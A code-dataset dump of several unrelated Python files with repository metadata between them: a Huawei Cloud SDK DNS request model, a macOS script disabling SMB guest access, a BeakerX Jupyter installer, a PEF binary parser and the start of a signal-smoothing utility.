'sort_dir': 'str',
'health_check_id': 'str',
'search_mode': 'str'
}
attribute_map = {
'zone_type': 'zone_type',
'marker': 'marker',
'limit': 'limit',
'offset': 'offset',
'line_id': 'line_id',
'tags': 'tags',
'status': 'status',
'type': 'type',
'name': 'name',
'id': 'id',
'records': 'records',
'sort_key': 'sort_key',
'sort_dir': 'sort_dir',
'health_check_id': 'health_check_id',
'search_mode': 'search_mode'
}
def __init__(self, zone_type=None, marker=None, limit=None, offset=None, line_id=None, tags=None, status=None, type=None, name=None, id=None, records=None, sort_key=None, sort_dir=None, health_check_id=None, search_mode=None):
"""ListRecordSetsWithLineRequest - a model defined in huaweicloud sdk"""
self._zone_type = None
self._marker = None
self._limit = None
self._offset = None
self._line_id = None
self._tags = None
self._status = None
self._type = None
self._name = None
self._id = None
self._records = None
self._sort_key = None
self._sort_dir = None
self._health_check_id = None
self._search_mode = None
self.discriminator = None
if zone_type is not None:
self.zone_type = zone_type
if marker is not None:
self.marker = marker
if limit is not None:
self.limit = limit
if offset is not None:
self.offset = offset
if line_id is not None:
self.line_id = line_id
if tags is not None:
self.tags = tags
if status is not None:
self.status = status
if type is not None:
self.type = type
if name is not None:
self.name = name
if id is not None:
self.id = id
if records is not None:
self.records = records
if sort_key is not None:
self.sort_key = sort_key
if sort_dir is not None:
self.sort_dir = sort_dir
if health_check_id is not None:
self.health_check_id = health_check_id
if search_mode is not None:
self.search_mode = search_mode
@property
def zone_type(self):
"""Gets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:return: The zone_type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._zone_type
@zone_type.setter
def zone_type(self, zone_type):
"""Sets the zone_type of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名类型。 取值范围:public 搜索模式默认为模糊搜索。 默认值为public。
:param zone_type: The zone_type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._zone_type = zone_type
@property
def marker(self):
"""Gets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:return: The marker of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._marker
@marker.setter
def marker(self, marker):
"""Sets the marker of this ListRecordSetsWithLineRequest.
分页查询起始的资源ID,为空时为查询第一页。 默认值为空。
:param marker: The marker of this ListRecordSetsWithLineRequest.
:type: str
"""
self._marker = marker
@property
def limit(self):
"""Gets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:return: The limit of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._limit
@limit.setter
def limit(self, limit):
"""Sets the limit of this ListRecordSetsWithLineRequest.
每页返回的资源个数。 取值范围:0~500 取值一般为10,20,50。默认值为500。
:param limit: The limit of this ListRecordSetsWithLineRequest.
:type: str
"""
self._limit = limit
@property
def offset(self):
"""Gets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:return: The offset of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._offset
@offset.setter
def offset(self, offset):
"""Sets the offset of this ListRecordSetsWithLineRequest.
分页查询起始偏移量,表示从偏移量的下一个资源开始查询。 取值范围:0~2147483647 默认值为0。 当前设置marker不为空时,以marker为分页起始标识。
:param offset: The offset of this ListRecordSetsWithLineRequest.
:type: str
"""
self._offset = offset
@property
def line_id(self):
"""Gets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:return: The line_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._line_id
@line_id.setter
def line_id(self, line_id):
"""Sets the line_id of this ListRecordSetsWithLineRequest.
解析线路ID。
:param line_id: The line_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._line_id = line_id
@property
def tags(self):
"""Gets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:return: The tags of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this ListRecordSetsWithLineRequest.
资源标签。 取值格式:key1,value1|key2,value2 多个标签之间用\"|\"分开,每个标签的键值用英文逗号\",\"相隔。
:param tags: The tags of this ListRecordSetsWithLineRequest.
:type: str
"""
self._tags = tags
@property
def status(self):
"""Gets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:return: The status of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ListRecordSetsWithLineRequest.
待查询的Record Set的状态。 取值范围:ACTIVE、ERROR、DISABLE、FREEZE、PENDING_CREATE、PENDING_UPDATE、PENDING_DELETE
:param status: The status of this ListRecordSetsWithLineRequest.
:type: str
"""
self._status = status
@property
def type(self):
"""Gets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:return: The type of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this ListRecordSetsWithLineRequest.
待查询的Record Set的记录集类型。 取值范围:A、CNAME、MX、AAAA、TXT、SRV、NS、CAA
:param type: The type of this ListRecordSetsWithLineRequest.
:type: str
"""
self._type = type
@property
def name(self):
"""Gets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:return: The name of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ListRecordSetsWithLineRequest.
待查询的Record Set的域名中包含此name。 搜索模式默认为模糊搜索。 默认值为空。
:param name: The name of this ListRecordSetsWithLineRequest.
:type: str
"""
self._name = name
@property
def id(self):
"""Gets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:return: The id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ListRecordSetsWithLineRequest.
待查询的Record Set的id包含此id。 搜索模式默认为模糊搜索。 默认值为空。
:param id: The id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._id = id
@property
def records(self):
"""Gets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:return: The records of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._records
@records.setter
def records(self, records):
"""Sets the records of this ListRecordSetsWithLineRequest.
待查询的Record Set的值中包含此records。 搜索模式默认为模糊搜索。 默认值为空。
:param records: The records of this ListRecordSetsWithLineRequest.
:type: str
"""
self._records = records
@property
def sort_key(self):
"""Gets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:return: The sort_key of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_key
@sort_key.setter
def sort_key(self, sort_key):
"""Sets the sort_key of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序字段。 取值范围: name:域名 type:记录集类型 默认值为空,表示不排序。
:param sort_key: The sort_key of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_key = sort_key
@property
def sort_dir(self):
"""Gets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:return: The sort_dir of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._sort_dir
@sort_dir.setter
def sort_dir(self, sort_dir):
"""Sets the sort_dir of this ListRecordSetsWithLineRequest.
查询结果中Record Set列表的排序方式。 取值范围: desc:降序排序 asc:升序排序 默认值为空,表示不排序。
:param sort_dir: The sort_dir of this ListRecordSetsWithLineRequest.
:type: str
"""
self._sort_dir = sort_dir
@property
def health_check_id(self):
"""Gets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:return: The health_check_id of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._health_check_id
@health_check_id.setter
def health_check_id(self, health_check_id):
"""Sets the health_check_id of this ListRecordSetsWithLineRequest.
健康检查ID。 搜索模式默认为模糊搜索。 默认值为空。
:param health_check_id: The health_check_id of this ListRecordSetsWithLineRequest.
:type: str
"""
self._health_check_id = health_check_id
@property
def search_mode(self):
"""Gets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:return: The search_mode of this ListRecordSetsWithLineRequest.
:rtype: str
"""
return self._search_mode
@search_mode.setter
def search_mode(self, search_mode):
"""Sets the search_mode of this ListRecordSetsWithLineRequest.
查询条件搜索模式。 取值范围: like:模糊搜索 equal:精确搜索 默认值为like。
:param search_mode: The search_mode of this ListRecordSetsWithLineRequest.
:type: str
"""
self._search_mode = search_mode
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListRecordSetsWithLineRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0 | 0 | 0 |
5fa9107ec28200cfbd67de77fced42b66d826210 | 1,354 | py | Python | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | 32 | 2017-11-01T17:20:41.000Z | 2020-06-22T02:18:48.000Z | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | null | null | null | mac_os_scripts/disable_guest_connection_to_shared_folders.py | initialed85/mac_os_scripts | aa8a2c1dc9193dbce796985f5f125c82f6f90bed | [
"MIT",
"BSD-3-Clause"
] | null | null | null | """
This script is responsible for disabling guest connection to shared folders
Commands used:
- defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false
"""
from common import CLITieIn
if __name__ == '__main__':
from utils import get_argparser, get_args
parser = get_argparser()
args = get_args(parser)
actor = GuestConnectionToSharedFoldersDisabler(
sudo_password=args.sudo_password,
)
result = actor.run()
if not result:
exit(1)
exit(0)
| 24.618182 | 128 | 0.672083 | """
This script is responsible for disabling guest connection to shared folders
Commands used:
- defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false
"""
from common import CLITieIn
class GuestConnectionToSharedFoldersDisabler(CLITieIn):
def disable_guest_connection_to_shared_folders(self):
command = '/usr/bin/defaults write /Library/Preferences/SystemConfiguration/com.apple.smb.server AllowGuestAccess false'
command_output = self.command(command)
if command_output.error_level != 0:
self._logger.error(
'{0} failed stating {1}'.format(
command, command_output
)
)
return False
return True
def run(self):
if not self.disable_guest_connection_to_shared_folders():
self._logger.error('failed disable_guest_connection_to_shared_folders; cannot continue')
return False
self._logger.debug('passed')
return True
if __name__ == '__main__':
from utils import get_argparser, get_args
parser = get_argparser()
args = get_args(parser)
actor = GuestConnectionToSharedFoldersDisabler(
sudo_password=args.sudo_password,
)
result = actor.run()
if not result:
exit(1)
exit(0)
| 699 | 34 | 76 |
baf91958f918e6464ab1f5387bba07762e5700a4 | 166 | py | Python | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | python_scripts/Developement/byteTest.py | ncku-uav/vis-frame-ncku | 10c5dd69f387a8022f4278bd3f21ac25f031bcf6 | [
"Apache-2.0"
] | null | null | null | import numpy as np
a = np.array(([109,15]), dtype=np.uint8)
b = np.ndarray((1,), dtype=np.uint16, buffer=a)
print(b*0.0062)
c = b.byteswap()
print(c)
print(c*0.0062) | 20.75 | 47 | 0.656627 | import numpy as np
a = np.array(([109,15]), dtype=np.uint8)
b = np.ndarray((1,), dtype=np.uint16, buffer=a)
print(b*0.0062)
c = b.byteswap()
print(c)
print(c*0.0062) | 0 | 0 | 0 |
43132477770b69de7164dba0f5bd31ee4551b24a | 8,359 | py | Python | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | beakerx/beakerx/install.py | altavir/beakerx | 06fb4200d8042fc2a52e3a1ce8be8aa4b72d3743 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Installs BeakerX into a Jupyter and Python environment.'''
import argparse
import json
import os
import pkg_resources
import shutil
import subprocess
import sys
import pathlib
import tempfile
from string import Template
from jupyter_client.kernelspecapp import KernelSpecManager
from jupyter_core import paths
from traitlets.config.manager import BaseJSONConfigManager
from distutils import log
if __name__ == "__main__":
install()
| 35.570213 | 116 | 0.656299 | # Copyright 2017 TWO SIGMA OPEN SOURCE, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''Installs BeakerX into a Jupyter and Python environment.'''
import argparse
import json
import os
import pkg_resources
import shutil
import subprocess
import sys
import pathlib
import tempfile
from string import Template
from jupyter_client.kernelspecapp import KernelSpecManager
from jupyter_core import paths
from traitlets.config.manager import BaseJSONConfigManager
from distutils import log
def _all_kernels():
kernels = pkg_resources.resource_listdir(
'beakerx', 'kernel')
return [kernel for kernel in kernels if (kernel != 'base' and kernel !='sparkex' and kernel !='runtimetools')]
def _base_classpath_for(kernel):
return pkg_resources.resource_filename(
'beakerx', os.path.join('kernel', kernel))
def _classpath_for(kernel):
return pkg_resources.resource_filename(
'beakerx', os.path.join('kernel', kernel, 'lib', '*'))
def _uninstall_nbextension():
subprocess.check_call(["jupyter", "nbextension", "disable", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "nbextension", "uninstall", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "serverextension", "disable", "beakerx", "--py", "--sys-prefix"])
def _install_nbextension():
if sys.platform == 'win32':
subprocess.check_call(["jupyter", "nbextension", "install", "beakerx", "--py", "--sys-prefix"])
else:
subprocess.check_call(["jupyter", "nbextension", "install", "beakerx", "--py", "--symlink", "--sys-prefix"])
subprocess.check_call(["jupyter", "nbextension", "enable", "beakerx", "--py", "--sys-prefix"])
subprocess.check_call(["jupyter", "serverextension", "enable", "beakerx", "--py", "--sys-prefix"])
def _install_labextensions(lab):
if lab:
subprocess.check_call(["jupyter", "labextension", "install", "@jupyter-widgets/jupyterlab-manager"])
subprocess.check_call(["jupyter", "labextension", "install", "beakerx-jupyterlab"])
def _uninstall_labextensions(lab):
if lab:
subprocess.check_call(["jupyter", "labextension", "uninstall", "beakerx-jupyterlab"])
subprocess.check_call(["jupyter", "labextension", "uninstall", "@jupyter-widgets/jupyterlab-manager"])
def _copy_tree(src, dst):
if os.path.exists(dst):
shutil.rmtree(dst)
shutil.copytree(src, dst)
def _copy_icons():
log.info("installing icons...")
kernels = KernelSpecManager().find_kernel_specs()
for kernel in _all_kernels():
dst_base = kernels.get(kernel)
src_base = _base_classpath_for(kernel)
shutil.copyfile(os.path.join(src_base, 'logo-32x32.png'), os.path.join(dst_base, 'logo-32x32.png'))
shutil.copyfile(os.path.join(src_base, 'logo-64x64.png'), os.path.join(dst_base, 'logo-64x64.png'))
def _install_css():
log.info("installing custom CSS...")
resource = os.path.join('static', 'custom')
src_base = pkg_resources.resource_filename('beakerx', resource)
dst_base = pkg_resources.resource_filename('notebook', resource)
_copy_tree(os.path.join(src_base, 'fonts'), os.path.join(dst_base, 'fonts'))
shutil.copyfile(os.path.join(src_base, 'custom.css'), os.path.join(dst_base, 'custom.css'))
def _install_kernels():
base_classpath = _classpath_for('base')
for kernel in _all_kernels():
kernel_classpath = _classpath_for(kernel)
classpath = json.dumps(os.pathsep.join([base_classpath, kernel_classpath]))
template = pkg_resources.resource_string(
'beakerx', os.path.join('kernel', kernel, 'kernel.json'))
contents = Template(template.decode()).substitute(PATH=classpath)
with tempfile.TemporaryDirectory() as tmpdir:
kernel_dir = os.path.join(tmpdir, kernel)
os.mkdir(kernel_dir)
with open(os.path.join(kernel_dir, 'kernel.json'), 'w') as f:
f.write(contents)
install_cmd = [
'jupyter', 'kernelspec', 'install',
'--sys-prefix', '--replace',
'--name', kernel, kernel_dir
]
subprocess.check_call(install_cmd)
def _uninstall_kernels():
for kernel in _all_kernels():
uninstall_cmd = [
'jupyter', 'kernelspec', 'remove', kernel, '-y', '-f'
]
try:
subprocess.check_call(uninstall_cmd)
except subprocess.CalledProcessError:
pass #uninstal_cmd prints the appropriate message
def _install_magics():
log.info("installing groovy magic for python...")
dir_path = os.path.join(sys.prefix, 'etc', 'ipython')
os.makedirs(dir_path, exist_ok=True)
with open(os.path.join(dir_path, 'ipython_config.py'), 'w+') as ipython_config:
ipython_config.write("c = get_config()\n")
ipython_config.write("c.InteractiveShellApp.extensions = ["
"'beakerx.autotranslation',\n"
"'beakerx_magics.kernel_magic',\n"
"'beakerx_magics.groovy_magic',\n"
"'beakerx_magics.clojure_magic',\n"
"'beakerx_magics.kotlin_magic',\n"
"'beakerx_magics.scala_magic',\n"
"'beakerx_magics.sql_magic',\n"
"'beakerx_magics.java_magic'\n"
"]\n")
def _set_conf_privileges():
config_path = os.path.join(paths.jupyter_config_dir(), 'beakerx.json')
if pathlib.Path(config_path).exists():
os.chmod(config_path, 0o600)
def _pretty(it):
return json.dumps(it, indent=2)
def _install_kernelspec_manager(prefix, disable=False):
CKSM = "beakerx.kernel_spec.BeakerXKernelSpec"
KSMC = "kernel_spec_class"
action_prefix = "Dis" if disable else "En"
log.info("{}abling BeakerX server config...".format(action_prefix))
path = os.path.join(prefix, "etc", "jupyter")
if not os.path.exists(path):
log.debug("Making directory {}...".format(path))
os.makedirs(path)
cm = BaseJSONConfigManager(config_dir=path)
cfg = cm.get("jupyter_notebook_config")
log.debug("Existing config in {}...\n{}".format(path, _pretty(cfg)))
nb_app = cfg.setdefault("KernelSpecManager", {})
if disable and nb_app.get(KSMC, None) == CKSM:
nb_app.pop(KSMC)
elif not disable:
nb_app.update({KSMC: CKSM})
log.debug("Writing config in {}...".format(path))
cm.set("jupyter_notebook_config", cfg)
cfg = cm.get("jupyter_notebook_config")
log.debug("Verifying config in {}...\n{}".format(path, _pretty(cfg)))
if disable:
assert KSMC not in cfg["KernelSpecManager"]
else:
assert cfg["KernelSpecManager"][KSMC] == CKSM
log.info("{}abled BeakerX server config".format(action_prefix))
def make_parser():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument("--prefix",
help="location of the environment to install into",
default=sys.prefix)
parser.add_argument("--disable",
help="Remove Beakerx extension",
action='store_true')
return parser
def _disable_beakerx(args):
_uninstall_nbextension()
_uninstall_labextensions(args.lab)
_uninstall_kernels()
_install_kernelspec_manager(args.prefix, disable=True)
def _install_beakerx(args):
_install_nbextension()
_install_labextensions(args.lab)
_install_kernels()
_install_css()
_copy_icons()
_install_kernelspec_manager(args.prefix)
_install_magics()
_set_conf_privileges()
def install(args):
_install_beakerx(args)
def uninstall(args):
_disable_beakerx(args)
if __name__ == "__main__":
install()
| 6,820 | 0 | 483 |
79117b489af4b29c9aed67fa82714cb3df577c31 | 2,613 | py | Python | pefbinary.py | elliotnunn/ToolboxToolbox | 2db6c57556cd12cf4bbb648df4a5d895e306babb | [
"MIT"
] | 14 | 2018-06-07T07:54:47.000Z | 2021-11-03T02:35:21.000Z | pefbinary.py | elliotnunn/ToolboxToolbox | 2db6c57556cd12cf4bbb648df4a5d895e306babb | [
"MIT"
] | 1 | 2017-01-05T15:07:34.000Z | 2017-01-06T13:53:00.000Z | pefbinary.py | elliotnunn/toolboxtoolbox | f67194a8893ec4277fa189412bcda5a62160ff99 | [
"MIT"
] | 4 | 2018-12-09T21:10:40.000Z | 2019-05-07T20:50:23.000Z | import struct
| 29.359551 | 122 | 0.574436 | import struct
class PEF:
MAGIC = b'Joy!'
CONT_HEAD_FMT = '>4s4s4s5I2HI'
CONT_HEAD_LEN = struct.calcsize(CONT_HEAD_FMT)
SEC_HEAD_FMT = '>i5I4B'
SEC_HED_LEN = struct.calcsize(SEC_HEAD_FMT)
@classmethod
def read_from(cls, path):
with open(path, 'rb') as f:
return cls(f.read())
def __init__(self, data):
(magic, fourcc, arch, ver,
timestamp, old_def_ver, old_imp_ver, cur_ver,
sec_count, inst_sec_count, reserv) = struct.unpack_from(self.CONT_HEAD_FMT, data)
sec_earliest = len(data)
sec_latest = 0
self.sections = []
self.sectypes = []
self.headeroffsets = []
self.code = None
for i in range(sec_count):
sh_offset = self.CONT_HEAD_LEN + self.SEC_HED_LEN*i
(sectionName, sectionAddress, execSize,
initSize, rawSize, containerOffset,
regionKind, shareKind, alignment, reserved) = struct.unpack_from(self.SEC_HEAD_FMT, data, sh_offset)
the_sec = data[containerOffset : containerOffset + rawSize]
if regionKind == 0 and execSize == initSize == rawSize:
the_sec = bytearray(the_sec)
self.code = the_sec
self.sections.append(the_sec)
self.sectypes.append(regionKind)
self.headeroffsets.append(sh_offset)
sec_earliest = min(sec_earliest, containerOffset)
sec_latest = max(sec_latest, containerOffset + rawSize)
if any(data[sec_latest:]):
print('nonzero trailing data from', hex(sec_latest), 'to', hex(len(data)), ' ... will cause incorrect output')
self.padmult = 1
while len(data) % (self.padmult * 2) == 0:
self.padmult *= 2
self.header = data[:sec_earliest]
def __bytes__(self):
accum = bytearray(self.header)
for i in range(len(self.sections)):
the_sec = self.sections[i]
hoff = self.headeroffsets[i]
while len(accum) % 16:
accum.append(0)
new_off = len(accum)
new_len = len(the_sec)
accum.extend(the_sec)
struct.pack_into('>I', accum, hoff + 20, new_off)
if the_sec is self.code:
for i in range(8, 20, 4):
struct.pack_into('>I', accum, hoff + i, new_len)
while len(accum) % self.padmult != 0:
accum.extend(b'\x00')
return bytes(accum)
def write_to(self, path):
with open(path, 'wb') as f:
f.write(bytes(self))
| 2,270 | 306 | 23 |
994da16e08cf7637ccc9aad09dc7d6c11b0ad8b3 | 1,363 | py | Python | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | 2 | 2020-08-05T09:10:24.000Z | 2020-08-05T14:21:23.000Z | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | null | null | null | G2G/preprocess/generate.py | mattiaforc/GDL | 2da0b8de66074bb188302bb670cca7e8bf64ff9e | [
"MIT"
] | null | null | null | import torch
import itertools
from typing import List, Tuple, Dict, Generator, Iterable
from tqdm import tqdm
from G2G.model.graph_wrapper import GraphWrapper
from G2G.utils import shortest_as_adj_from_graph_wrapper
| 40.088235 | 118 | 0.611886 | import torch
import itertools
from typing import List, Tuple, Dict, Generator, Iterable
from tqdm import tqdm
from G2G.model.graph_wrapper import GraphWrapper
from G2G.utils import shortest_as_adj_from_graph_wrapper
def generate_graphs(iterations: int, N: int, random: str = 'randn') -> Generator[GraphWrapper, None, None]:
for _ in range(iterations):
A = torch.zeros((N, N))
for i in range(N):
for j in range(i + 1):
A[i][j] = A[j][i]
else:
A[i][j + 1::] = torch.nn.functional.relu(
torch.randn((1, N - i - 1)) if random == 'randn' else torch.randint(0, 10, (1, N - i - 1)))
yield GraphWrapper(A)
def generate_dataset(iterations: int, N: int, random: str = 'randn', tqdm_enabled: bool = True) \
-> Tuple[List[GraphWrapper], Dict[str, Dict[Tuple[int, int], torch.Tensor]]]:
y = {}
x = []
custom_range: Iterable = tqdm(generate_graphs(iterations, N, random=random),
total=iterations) if tqdm_enabled else generate_graphs(iterations, N, random=random)
for graph in custom_range:
x.append(graph)
y[str(graph)] = {}
for combo in itertools.combinations(range(1, N + 1), r=2):
y[str(graph)][combo] = shortest_as_adj_from_graph_wrapper(graph, *combo)
return x, y
| 1,099 | 0 | 46 |
503fcf1b261f7924290509d952410445f9afbf70 | 21,163 | py | Python | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 8 | 2020-10-12T04:27:04.000Z | 2022-03-08T16:56:57.000Z | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 666 | 2020-09-30T21:18:41.000Z | 2022-03-31T22:37:12.000Z | _delphi_utils_python/delphi_utils/smooth.py | qx-teo/covidcast-indicators | 6eabe62748a206b5e6d65f9e11c65ef1c76cdb0a | [
"MIT"
] | 13 | 2020-10-01T14:25:06.000Z | 2022-02-12T08:31:19.000Z | """Smoother utility.
This file contains the smoothing utility functions. We have a number of
possible smoothers to choose from: windowed average, local weighted regression,
and a causal Savitzky-Golay filter.
Code is courtesy of Dmitry Shemetov, Maria Jahja, and Addison Hu.
These smoothers are all functions that take a 1D numpy array and return a smoothed
1D numpy array of the same length (with a few np.nans in the beginning). See the
docstrings for details.
"""
from typing import Union
import warnings
import numpy as np
import pandas as pd
class Smoother: # pylint: disable=too-many-instance-attributes
"""Smoother class.
This is the smoothing utility class. This class holds the parameter settings for its smoother
methods and provides reasonable defaults. Basic usage can be found in the examples below.
The smoother function takes numpy arrays or pandas Series as input, expecting the values to be
on a regularly-spaced time grid. NANs are ok, as long as the array does not begin with a NAN.
The rest of the NANs will be handled via imputation by default, though this can be turned off.
Parameters
----------
smoother_name: {'savgol', 'moving_average', 'identity', 'left_gauss_linear'}
This variable specifies the smoother. We have four smoothers, currently:
* 'savgol' or a Savtizky-Golay smoother (default)
* 'moving_average' or a moving window average smoother
* 'identity' or the trivial smoother (no smoothing)
* 'left_gauss_linear' or a Gaussian-weight linear regression smoother
Descriptions of the smoothers are available in the doc strings. Full mathematical
details are in: https://github.com/cmu-delphi/covidcast-modeling/ in the folder
'indicator_smoother'.
poly_fit_degree: int
A parameter for the 'savgol' smoother which sets the degree of the polynomial fit.
window_length: int
The length of the fitting window for 'savgol' and the averaging window 'moving_average'.
This value is in the units provided by the data, which are likely to be days for Delphi.
Note that if window_length is smaller than the length of the signal, then only the
imputation method is run on the signal.
gaussian_bandwidth: float or None
If float, all regression is done with Gaussian weights whose variance is
half the gaussian_bandwidth. If None, performs unweighted regression. (Applies
to 'left_gauss_linear' and 'savgol'.)
Here are some reference values (the given bandwidth produces a 95% weighting on
the data of length time window into the past):
time window | bandwidth
7 36
14 144
21 325
28 579
35 905
42 1303
impute: {'savgol', 'zeros', None}
If 'savgol' (default), will fill nan values with a savgol fit on the largest available time
window prior (up to window_length). If 'zeros', will fill nan values with zeros.
If None, leaves the nans in place.
minval: float or None
The smallest value to allow in a signal. If None, there is no smallest value.
Currently only implemented for 'left_gauss_linear'. This should probably not be in the scope
of the smoothing utility.
boundary_method: {'shortened_window', 'identity', 'nan'}
Determines how the 'savgol' method handles smoothing at the (left) boundary, where the past
data length is shorter than the window_length parameter. If 'shortened_window', it uses the
maximum window available; at the very edge (generally up to poly_fit_degree) it keeps the
same value as the raw signal. If 'identity', it just keeps the raw signal. If 'nan', it
writes nans. For the other smoothing methods, 'moving_average' writes nans and
'left_gauss_linear' uses a shortened window.
Methods
----------
smooth: np.ndarray or pd.Series
Takes a 1D signal and returns a smoothed version.
The input and the output have the same length and type.
Example Usage
-------------
Example 1. Apply a rolling average smoother with a window of length 10.
>>> smoother = Smoother(smoother_name='moving_average', window_length=10)
>>> smoothed_signal = smoother.smooth(signal)
Example 2. Smooth a dataframe column.
>>> smoother = Smoother(smoother_name='savgol')
>>> df[col] = df[col].transform(smoother.smooth)
Example 3. Apply a rolling weighted average smoother, with 95% weight on the recent 2 weeks and
a sharp cutoff after 4 weeks.
